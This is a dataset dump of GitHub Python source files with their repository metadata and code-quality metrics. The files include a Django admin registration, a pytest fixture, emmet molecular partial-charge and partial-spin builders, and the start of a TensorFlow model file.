hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
aceb3ca7af0e36f3c1861691d61d64290bea1372
| 126
|
py
|
Python
|
bridges/admin.py
|
vitale232/InspectionPlanner
|
4d9c9b494e6b3587eb182e9c34ea3d6aee5546e8
|
[
"MIT"
] | 1
|
2020-01-30T12:32:38.000Z
|
2020-01-30T12:32:38.000Z
|
bridges/admin.py
|
vitale232/InspectionPlanner
|
4d9c9b494e6b3587eb182e9c34ea3d6aee5546e8
|
[
"MIT"
] | 45
|
2019-07-27T02:12:11.000Z
|
2022-03-02T04:59:15.000Z
|
bridges/admin.py
|
vitale232/InspectionPlanner
|
4d9c9b494e6b3587eb182e9c34ea3d6aee5546e8
|
[
"MIT"
] | null | null | null |
from django.contrib.gis import admin
from .models import NewYorkBridge
admin.site.register(NewYorkBridge, admin.OSMGeoAdmin)
| 25.2
| 53
| 0.84127
| 16
| 126
| 6.625
| 0.6875
| 0.339623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.087302
| 126
| 4
| 54
| 31.5
| 0.921739
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
c5bfcca5b980e86cce3ae40ee9a832de9538723e
| 171
|
py
|
Python
|
tests/conftest.py
|
Shinichi-Nakagawa/streamlit-sample-ohtani-san
|
45847caef82eadf0c30cb33b1a9cf65f1518a339
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
Shinichi-Nakagawa/streamlit-sample-ohtani-san
|
45847caef82eadf0c30cb33b1a9cf65f1518a339
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
Shinichi-Nakagawa/streamlit-sample-ohtani-san
|
45847caef82eadf0c30cb33b1a9cf65f1518a339
|
[
"MIT"
] | 1
|
2021-11-01T14:31:36.000Z
|
2021-11-01T14:31:36.000Z
|
import pytest
import pandas as pd
from interfaces.ml import DataFrame
@pytest.fixture
def df() -> DataFrame:
return pd.read_csv('./tests/dataset/test_dataset.csv')
| 17.1
| 58
| 0.754386
| 25
| 171
| 5.08
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 171
| 9
| 59
| 19
| 0.863946
| 0
| 0
| 0
| 0
| 0
| 0.187135
| 0.187135
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| true
| 0
| 0.5
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
c5d3ad73d1b7648e9587edf1e6b048d929e6e908
| 17,192
|
py
|
Python
|
emmet-builders/emmet/builders/molecules/atomic.py
|
acrutt/emmet
|
e98100c9932f145a3ad3087ddb7aa9b779d9a191
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
emmet-builders/emmet/builders/molecules/atomic.py
|
acrutt/emmet
|
e98100c9932f145a3ad3087ddb7aa9b779d9a191
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
emmet-builders/emmet/builders/molecules/atomic.py
|
acrutt/emmet
|
e98100c9932f145a3ad3087ddb7aa9b779d9a191
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
from datetime import datetime
from itertools import chain
from math import ceil
from typing import Optional, Iterable, Iterator, List, Dict
from maggma.builders import Builder
from maggma.core import Store
from maggma.utils import grouper
from emmet.core.qchem.task import TaskDocument
from emmet.core.qchem.molecule import MoleculeDoc, evaluate_lot
from emmet.core.molecules.atomic import (
PartialChargesDoc,
PartialSpinsDoc,
CHARGES_METHODS,
SPINS_METHODS,
)
from emmet.core.utils import jsanitize
from emmet.builders.settings import EmmetBuildSettings
__author__ = "Evan Spotte-Smith"
SETTINGS = EmmetBuildSettings()
class PartialChargesBuilder(Builder):
"""
The PartialChargesBuilder extracts partial charges data from a MoleculeDoc.
Various methods can be used to define partial charges, including:
- Mulliken
- Restrained Electrostatic Potential (RESP)
- Critic2
- Natural Bonding Orbital (NBO) population analysis
This builder will attempt to build documents for each molecule with each method.
For each molecule-method combination, the highest-quality data available (based
on level of theory and electronic energy) will be used.
The process is as follows:
1. Gather MoleculeDocs by formula
2. For each molecule, sort all associated tasks by level of theory and electronic energy
2. For each method:
2.1. Find task docs with necessary data to calculate partial charges by that method
2.2. Take best (defined by level of theory and electronic energy) task
2.3. Convert TaskDoc to PartialChargesDoc
"""
def __init__(
self,
tasks: Store,
molecules: Store,
charges: Store,
query: Optional[Dict] = None,
methods: Optional[List] = None,
settings: Optional[EmmetBuildSettings] = None,
**kwargs,
):
self.tasks = tasks
self.molecules = molecules
self.charges = charges
self.query = query if query else dict()
self.methods = methods if methods else CHARGES_METHODS
self.settings = EmmetBuildSettings.autoload(settings)
self.kwargs = kwargs
super().__init__(sources=[tasks, molecules], targets=[charges])
def ensure_indexes(self):
"""
Ensures indices on the collections needed for building
"""
# Basic search index for tasks
self.tasks.ensure_index("task_id")
self.tasks.ensure_index("last_updated")
self.tasks.ensure_index("state")
self.tasks.ensure_index("formula_alphabetical")
# Search index for molecules
self.molecules.ensure_index("molecule_id")
self.molecules.ensure_index("last_updated")
self.molecules.ensure_index("task_ids")
self.molecules.ensure_index("formula_alphabetical")
# Search index for charges
self.charges.ensure_index("molecule_id")
self.charges.ensure_index("method")
self.charges.ensure_index("task_id")
self.charges.ensure_index("last_updated")
self.charges.ensure_index("formula_alphabetical")
def prechunk(self, number_splits: int) -> Iterable[Dict]: # pragma: no cover
"""Prechunk the builder for distributed computation"""
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.charges.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
N = ceil(len(to_process_forms) / number_splits)
for formula_chunk in grouper(to_process_forms, N):
yield {"query": {"formula_alphabetical": {"$in": list(formula_chunk)}}}
def get_items(self) -> Iterator[List[Dict]]:
"""
Gets all items to process into partial charges documents.
This does no datetime checking; relying on on whether
task_ids are included in the charges Store
Returns:
generator or list relevant tasks and molecules to process into documents
"""
self.logger.info("Partial charges builder started")
self.logger.info("Setting indexes")
self.ensure_indexes()
# Save timestamp to mark buildtime
self.timestamp = datetime.utcnow()
# Get all processed molecules
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.charges.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
self.logger.info(f"Found {len(to_process_docs)} unprocessed documents")
self.logger.info(f"Found {len(to_process_forms)} unprocessed formulas")
# Set total for builder bars to have a total
self.total = len(to_process_forms)
for formula in to_process_forms:
mol_query = dict(temp_query)
mol_query["formula_alphabetical"] = formula
molecules = list(self.molecules.query(criteria=mol_query))
yield molecules
def process_item(self, items: List[Dict]) -> List[Dict]:
"""
Process the tasks into PartialChargesDocs
Args:
tasks List[Dict] : a list of MoleculeDocs in dict form
Returns:
[dict] : a list of new partial charges docs
"""
mols = [MoleculeDoc(**item) for item in items]
formula = mols[0].formula_alphabetical
mol_ids = [m.molecule_id for m in mols]
self.logger.debug(f"Processing {formula} : {mol_ids}")
charges_docs = list()
for mol in mols:
correct_charge_spin = [
e
for e in mol.entries
if e["charge"] == mol.charge
and e["spin_multiplicity"] == mol.spin_multiplicity
]
sorted_entries = sorted(
correct_charge_spin,
key=lambda x: (sum(evaluate_lot(x["level_of_theory"])), x["energy"]),
)
for method in self.methods:
# For each method, grab entries that have the relevant data
relevant_entries = [
e
for e in sorted_entries
if e.get(method) is not None or e["output"].get(method) is not None
]
if len(relevant_entries) == 0:
continue
# Grab task document of best entry
best_entry = relevant_entries[0]
task = best_entry["task_id"]
task_doc = TaskDocument(**self.tasks.query_one({"task_id": int(task)}))
doc = PartialChargesDoc.from_task(
task_doc,
molecule_id=mol.molecule_id,
preferred_methods=[method],
deprecated=False,
)
charges_docs.append(doc)
self.logger.debug(f"Produced {len(charges_docs)} charges docs for {formula}")
return jsanitize([doc.dict() for doc in charges_docs], allow_bson=True)
def update_targets(self, items: List[List[Dict]]):
"""
Inserts the new documents into the charges collection
Args:
items [[dict]]: A list of documents to update
"""
docs = list(chain.from_iterable(items)) # type: ignore
# Add timestamp
for item in docs:
item.update(
{
"_bt": self.timestamp,
}
)
molecule_ids = list({item["molecule_id"] for item in docs})
if len(items) > 0:
self.logger.info(f"Updating {len(docs)} partial charges documents")
self.charges.remove_docs({self.charges.key: {"$in": molecule_ids}})
# Neither molecule_id nor method need to be unique, but the combination must be
self.charges.update(
docs=docs,
key=["molecule_id", "method"],
)
else:
self.logger.info("No items to update")
class PartialSpinsBuilder(Builder):
"""
The PartialSpinsBuilder extracts partial spin data from a MoleculeDoc.
Various methods can be used to define partial atomic spins, including:
- Mulliken
- Natural Bonding Orbital (NBO) population analysis
This builder will attempt to build documents for each molecule with each method.
For each molecule-method combination, the highest-quality data available (based
on level of theory and electronic energy) will be used.
The process is as follows:
1. Gather MoleculeDocs by formula
2. For each molecule, sort all associated tasks by level of theory and electronic energy
2. For each method:
2.1. Find task docs with necessary data to calculate partial spins by that method
2.2. Take best (defined by level of theory and electronic energy) task
2.3. Convert TaskDoc to PartialChargesDoc
"""
def __init__(
self,
tasks: Store,
molecules: Store,
spins: Store,
query: Optional[Dict] = None,
methods: Optional[List] = None,
settings: Optional[EmmetBuildSettings] = None,
**kwargs,
):
self.tasks = tasks
self.molecules = molecules
self.spins = spins
self.query = query if query else dict()
self.methods = methods if methods else SPINS_METHODS
self.settings = EmmetBuildSettings.autoload(settings)
self.kwargs = kwargs
super().__init__(sources=[tasks, molecules], targets=[spins])
def ensure_indexes(self):
"""
Ensures indices on the collections needed for building
"""
# Basic search index for tasks
self.tasks.ensure_index("task_id")
self.tasks.ensure_index("last_updated")
self.tasks.ensure_index("state")
self.tasks.ensure_index("formula_alphabetical")
# Search index for molecules
self.molecules.ensure_index("molecule_id")
self.molecules.ensure_index("last_updated")
self.molecules.ensure_index("task_ids")
self.molecules.ensure_index("formula_alphabetical")
# Search index for charges
self.spins.ensure_index("molecule_id")
self.spins.ensure_index("method")
self.spins.ensure_index("task_id")
self.spins.ensure_index("last_updated")
self.spins.ensure_index("formula_alphabetical")
def prechunk(self, number_splits: int) -> Iterable[Dict]: # pragma: no cover
"""Prechunk the builder for distributed computation"""
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.spins.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
N = ceil(len(to_process_forms) / number_splits)
for formula_chunk in grouper(to_process_forms, N):
yield {"query": {"formula_alphabetical": {"$in": list(formula_chunk)}}}
def get_items(self) -> Iterator[List[Dict]]:
"""
Gets all items to process into partial spins documents.
This does no datetime checking; relying on on whether
task_ids are included in the spins Store
Returns:
generator or list relevant tasks and molecules to process into documents
"""
self.logger.info("Partial spins builder started")
self.logger.info("Setting indexes")
self.ensure_indexes()
# Save timestamp to mark buildtime
self.timestamp = datetime.utcnow()
# Get all processed molecules
temp_query = dict(self.query)
temp_query["deprecated"] = False
self.logger.info("Finding documents to process")
all_mols = list(
self.molecules.query(
temp_query, [self.molecules.key, "formula_alphabetical"]
)
)
processed_docs = set([e for e in self.spins.distinct("molecule_id")])
to_process_docs = {d[self.molecules.key] for d in all_mols} - processed_docs
to_process_forms = {
d["formula_alphabetical"]
for d in all_mols
if d[self.molecules.key] in to_process_docs
}
self.logger.info(f"Found {len(to_process_docs)} unprocessed documents")
self.logger.info(f"Found {len(to_process_forms)} unprocessed formulas")
# Set total for builder bars to have a total
self.total = len(to_process_forms)
for formula in to_process_forms:
mol_query = dict(temp_query)
mol_query["formula_alphabetical"] = formula
molecules = list(self.molecules.query(criteria=mol_query))
yield molecules
def process_item(self, items: List[Dict]) -> List[Dict]:
"""
Process the tasks into PartialSpinsDocs
Args:
tasks List[Dict] : a list of MoleculeDocs in dict form
Returns:
[dict] : a list of new partial spins docs
"""
mols = [MoleculeDoc(**item) for item in items]
formula = mols[0].formula_alphabetical
mol_ids = [m.molecule_id for m in mols]
self.logger.debug(f"Processing {formula} : {mol_ids}")
spins_docs = list()
for mol in mols:
# Molecule with spin multiplicity 1 has no partial spins
if mol.spin_multiplicity == 1:
continue
correct_charge_spin = [
e
for e in mol.entries
if e["charge"] == mol.charge
and e["spin_multiplicity"] == mol.spin_multiplicity
]
sorted_entries = sorted(
correct_charge_spin,
key=lambda x: (sum(evaluate_lot(x["level_of_theory"])), x["energy"]),
)
for method in self.methods:
# For each method, grab entries that have the relevant data
relevant_entries = [
e
for e in sorted_entries
if e.get(method) is not None or e["output"].get(method) is not None
]
if len(relevant_entries) == 0:
continue
# Grab task document of best entry
best_entry = relevant_entries[0]
task = best_entry["task_id"]
task_doc = TaskDocument(**self.tasks.query_one({"task_id": int(task)}))
doc = PartialSpinsDoc.from_task(
task_doc,
molecule_id=mol.molecule_id,
preferred_methods=[method],
deprecated=False,
)
spins_docs.append(doc)
self.logger.debug(
f"Produced {len(spins_docs)} partial spins docs for {formula}"
)
return jsanitize([doc.dict() for doc in spins_docs], allow_bson=True)
def update_targets(self, items: List[List[Dict]]):
"""
Inserts the new documents into the spins collection
Args:
items [[dict]]: A list of documents to update
"""
docs = list(chain.from_iterable(items)) # type: ignore
# Add timestamp
for item in docs:
item.update(
{
"_bt": self.timestamp,
}
)
molecule_ids = list({item["molecule_id"] for item in docs})
if len(items) > 0:
self.logger.info(f"Updating {len(docs)} partial spins documents")
self.spins.remove_docs({self.spins.key: {"$in": molecule_ids}})
# Neither molecule_id nor method need to be unique, but the combination must be
self.spins.update(
docs=docs,
key=["molecule_id", "method"],
)
else:
self.logger.info("No items to update")
| 34.315369
| 96
| 0.602257
| 2,001
| 17,192
| 5.033483
| 0.125437
| 0.028594
| 0.02224
| 0.015886
| 0.874106
| 0.855242
| 0.851271
| 0.851271
| 0.851271
| 0.843328
| 0
| 0.002451
| 0.311831
| 17,192
| 500
| 97
| 34.384
| 0.848872
| 0.222138
| 0
| 0.686007
| 0
| 0
| 0.12146
| 0.007003
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040956
| false
| 0
| 0.040956
| 0
| 0.095563
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c5ff3ba9d8554ff3ea2f46ed0788e2af4b308665
| 93
|
py
|
Python
|
src/Creation/__init__.py
|
gr4ph0s/c4d_redshift_light_lister
|
f227caf32cfd4eb5ed0810b8aedc1dff38ba2262
|
[
"MIT"
] | 7
|
2017-12-11T22:38:31.000Z
|
2021-05-12T07:27:01.000Z
|
src/Creation/__init__.py
|
gr4ph0s/c4d_redshift_light_lister
|
f227caf32cfd4eb5ed0810b8aedc1dff38ba2262
|
[
"MIT"
] | 1
|
2020-10-23T16:55:06.000Z
|
2020-10-27T16:52:04.000Z
|
src/Creation/__init__.py
|
gr4ph0s/c4d_redshift_light_lister
|
f227caf32cfd4eb5ed0810b8aedc1dff38ba2262
|
[
"MIT"
] | 2
|
2019-07-01T07:45:11.000Z
|
2021-05-11T16:59:05.000Z
|
from .CreationRedshift import CreationRedshift
from .CreationFunction import CreationFunction
| 46.5
| 46
| 0.903226
| 8
| 93
| 10.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075269
| 93
| 2
| 47
| 46.5
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a83f7be502c15db872f63fd8c2054d11d5e4322a
| 205
|
py
|
Python
|
PokerRL/rl/neural/__init__.py
|
MAWUT0R/PokerRL
|
95708a5f7a16cb151bc4253132bdfd22ea7a9b25
|
[
"MIT"
] | 247
|
2019-06-20T16:41:36.000Z
|
2022-03-28T11:40:12.000Z
|
PokerRL/rl/neural/__init__.py
|
MAWUT0R/PokerRL
|
95708a5f7a16cb151bc4253132bdfd22ea7a9b25
|
[
"MIT"
] | 11
|
2019-08-23T09:20:31.000Z
|
2021-12-05T23:44:27.000Z
|
PokerRL/rl/neural/__init__.py
|
MAWUT0R/PokerRL
|
95708a5f7a16cb151bc4253132bdfd22ea7a9b25
|
[
"MIT"
] | 61
|
2019-06-17T06:06:11.000Z
|
2022-03-01T17:55:44.000Z
|
from .MainPokerModuleFLAT import *
from .MainPokerModuleRNN import *
from .AvrgStrategyNet import *
from .AdvantageNet import *
from .DuelingQNet import *
from .NetWrapperBase import *
from .QNet import *
| 25.625
| 34
| 0.795122
| 21
| 205
| 7.761905
| 0.428571
| 0.368098
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.136585
| 205
| 7
| 35
| 29.285714
| 0.920904
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a84c6fb83bbb57b6b2024a708b2a88b18722bc39
| 121
|
py
|
Python
|
p2016_05_28_python_path_find/child/main.py
|
zhyq0826/blog-code
|
4369d653dea4a7a054dc796d14faea727973258f
|
[
"MIT"
] | 1
|
2018-07-07T14:35:55.000Z
|
2018-07-07T14:35:55.000Z
|
p2016_05_28_python_path_find/child/main.py
|
zhyq0826/blog-code
|
4369d653dea4a7a054dc796d14faea727973258f
|
[
"MIT"
] | null | null | null |
p2016_05_28_python_path_find/child/main.py
|
zhyq0826/blog-code
|
4369d653dea4a7a054dc796d14faea727973258f
|
[
"MIT"
] | null | null | null |
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
if __name__ == '__main__':
pass
| 17.285714
| 62
| 0.719008
| 19
| 121
| 3.947368
| 0.631579
| 0.16
| 0.346667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009524
| 0.132231
| 121
| 7
| 63
| 17.285714
| 0.704762
| 0
| 0
| 0
| 0
| 0
| 0.065574
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.4
| 0
| 0.4
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
a88c1349c9d9c6d76d1845390f2f69ffc71b827d
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/pip/_internal/cli/base_command.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/pip/_internal/cli/base_command.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/pip/_internal/cli/base_command.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/76/6b/dd/3585dc52fdc12b27f32d565b257ad6a3a19cf8f322d909832fbe75f6f9
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.40625
| 0
| 96
| 1
| 96
| 96
| 0.489583
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
76458797d451edce979b10e65894b7651e98be69
| 42
|
py
|
Python
|
hrnet_pose/__init__.py
|
ovs-code/HRNet-Human-Pose-Estimation
|
ddba0bd95a96bc9e95183af5ad172cb7c1fb24e8
|
[
"MIT"
] | null | null | null |
hrnet_pose/__init__.py
|
ovs-code/HRNet-Human-Pose-Estimation
|
ddba0bd95a96bc9e95183af5ad172cb7c1fb24e8
|
[
"MIT"
] | null | null | null |
hrnet_pose/__init__.py
|
ovs-code/HRNet-Human-Pose-Estimation
|
ddba0bd95a96bc9e95183af5ad172cb7c1fb24e8
|
[
"MIT"
] | null | null | null |
from . import config, core, models, utils
| 21
| 41
| 0.738095
| 6
| 42
| 5.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 42
| 1
| 42
| 42
| 0.885714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
768cb78affe687d6150c57527b7f0c0e157c9cf9
| 50,171
|
py
|
Python
|
src/model.py
|
yuanpengX/MASS
|
1ed9116a47c94e994ba794195ba926d333f815d2
|
[
"MIT"
] | 5
|
2019-11-07T03:20:19.000Z
|
2021-04-16T07:28:57.000Z
|
src/model.py
|
mlcb-thu/MASS
|
1ed9116a47c94e994ba794195ba926d333f815d2
|
[
"MIT"
] | null | null | null |
src/model.py
|
mlcb-thu/MASS
|
1ed9116a47c94e994ba794195ba926d333f815d2
|
[
"MIT"
] | 2
|
2019-11-03T06:15:51.000Z
|
2020-03-19T08:49:09.000Z
|
# encoding: utf-8
# author: xiongyuanpeng
# 2018-11-14
import tensorflow as tf
import numpy as np
from tensorlayer.layers import Conv2d, LambdaLayer, ConvLSTMLayer, BiRNNLayer, InputLayer, DenseLayer, FlattenLayer, PReluLayer
from tensorlayer.layers import * #TileLayer, ElementwiseLayer, ExpandDimsLayer, Conv1d,ConcatLayer, ElementwiseLayer,DropoutLayer,MaxPool1d
import tensorlayer as tl
from matplotlib import pyplot as plt
from config import *
import logging
from util import *
logging.basicConfig(level=logging.INFO)
KERNEL_SIZE = 5
stddev = 1
def Selector(t_sequences, reuse = False):
'''
